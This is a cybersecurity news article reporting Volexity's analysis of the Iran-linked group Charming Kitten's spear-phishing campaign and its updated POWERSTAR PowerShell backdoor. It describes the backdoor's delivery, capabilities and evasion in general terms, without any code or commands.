Charming Kitten, a nation-state actor associated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been identified as the perpetrator behind a sophisticated spear-phishing campaign utilizing an updated version of the powerful PowerShell backdoor known as POWERSTAR. This backdoor, also referred to as CharmPower, has been deployed in targeted espionage attacks aimed at gathering sensitive information.
According to researchers at Volexity, the malware used in the campaign has undergone significant improvements in operational security measures, making it more challenging to analyze and gather intelligence. Charming Kitten is well-known for its expertise in social engineering tactics, often creating tailored fake personas on social media platforms to establish rapport with targets before delivering malicious links. The group is also known by other names such as APT35, Cobalt Illusion, Mint Sandstorm, and Yellow Garuda.
Recent intrusions attributed to Charming Kitten have involved the use of other implants, including PowerLess and BellaCiao, indicating the group's extensive arsenal of espionage tools.
The POWERSTAR backdoor was initially uncovered by Check Point in January 2022, revealing its association with attacks exploiting the Log4Shell vulnerabilities in publicly-exposed Java applications. Since then, it has been observed in at least two other campaigns, as documented by PwC and Microsoft.
In the May 2023 attack wave, Volexity detected a variant of POWERSTAR distributed via a password-protected RAR file containing an LNK file that downloads the backdoor from Backblaze. Notably, Charming Kitten took measures to impede analysis by delivering the decryption method separately from the initial code and avoiding writing it to disk.
POWERSTAR boasts a wide range of features, enabling remote execution of PowerShell and C# commands, system information collection, persistence establishment, and module downloading. It can also perform tasks like process enumeration, screenshot capture, file search, and monitoring of persistence components. The malware's cleanup module has been improved to erase its traces and delete persistence-related registry keys, underscoring Charming Kitten's dedication to refining techniques and evading detection.
Volexity researchers also discovered another variant of POWERSTAR attempting to retrieve a hard-coded command-and-control (C2) server by decoding a file stored on the decentralized InterPlanetary Filesystem (IPFS). This highlights the group's efforts to enhance the resilience of its attack infrastructure.
The cybersecurity community continues to monitor Charming Kitten's activities closely, with the group's utilization of POWERSTAR pointing to a broader set of tools employed for malware-enabled espionage.
Comments